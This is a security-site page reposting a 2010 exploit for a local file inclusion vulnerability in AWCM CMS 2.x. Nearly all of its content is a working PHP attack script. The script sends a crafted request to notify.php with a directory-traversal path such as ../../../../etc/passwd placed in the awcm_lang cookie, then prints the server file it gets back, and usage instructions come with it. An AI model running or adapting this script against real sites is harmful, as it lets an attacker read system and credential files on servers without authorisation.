首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AWCM CMS Local File Inclusion Vulnerability
来源:x0.root(at)gmail.com 作者:SwEET-DeViL 发布时间:2010-06-11  
===========================================
AWCM CMS Local File Inclusion Vulnerability
===========================================

# Software Link: http://www.awcm-cms.com/
# Version: 2.x
# Tested on: Lunix
 
Exploit :
 
<?php
 
print("
------------------------------------------------------------
| Awcm Cms Local File Inclusion Vulnerability
| By SwEET-DeViL
| x0.root(at)gmail.com
| example
|
| Exploit.php ".$argv[0]." example.com /path/ ../../../../../../../../etc/passwd
------------------------------------------------------------
");
$host =$argv[1];//;
$Path = "http://".$host.$argv[2];
       $CURL_in ="GET ".$Path."/notify.php?v=a HTTP/1.0\r\n";
       $CURL_in.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1)\r\n";
       $CURL_in.="Pragma: no-cache\r\n";
       $CURL_in.="Cookie: awcm_lang=".$argv[3]."".";\r\n";
       $CURL_in.="Connection: Close\r\n\r\n";
 
       if ( empty($argv[3]) ){
               echo "\n[-] Error : Exploit failed\n";
               die;
       }
 
       $FoN = @fsockopen($host, 80);
       if(!$FoN){
               echo "\n[-] Error : Can't connect to ".$host." !!\n";
               die;
       }
 
       fputs($FoN, $CURL_in);
       while (!feof($FoN)) $data .= fread($FoN, 1024);
       fclose($FoN);
 
       $error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );
       if ( !empty($error_1) ){
               echo "\n[-] Error : 404 Not Found. \n";
               die;
       }
 
       $error_2 = strstr( $data, "HTTP/1.1 406 Not Acceptable" );
       if ( !empty($error_2) ){
               echo "\n[-] Error : 406 Not Acceptable. \n";
               die;
       }
 
 
 
$EXc = explode("</head>",$data);
$EXx = explode("<head>",$EXc[1]);
$CODE = strip_tags($EXx[0]);
$CODE2 = preg_replace("/\r|\t/",'',$CODE);
$CODE2 = trim($CODE2);
 
if (empty($CODE2)){
print ('
 
[-] Error : Sorry! File not Found
 
');
}else{
print ('
[+]
------------------------------------------------------------
').$CODE2;
 
 
 
print ('
 
------------------------------------------------------------
');
 
}
 
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·K-Meleon Remote Denial of Serv
·ActivePerl v5.8.8.817 Buffer O
·Orca Browser Remoter Denial Of
·Microsoft Windows Help Centre
·Firefox 3.6.3 Remoter Denial O
·Safari 5.0 Remote Buffer OverF
·Solaris/x86 - Sync() & reboot(
·Adobe InDesign CS3 INDD File H
·Netvolution CMS <= 2.x SQL Inj
·nginx 0.8.36 Source Disclosure
·Power Tab Editor v1.7 (Build 8
·Netscape Navigator v9.0.0.6 (m
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved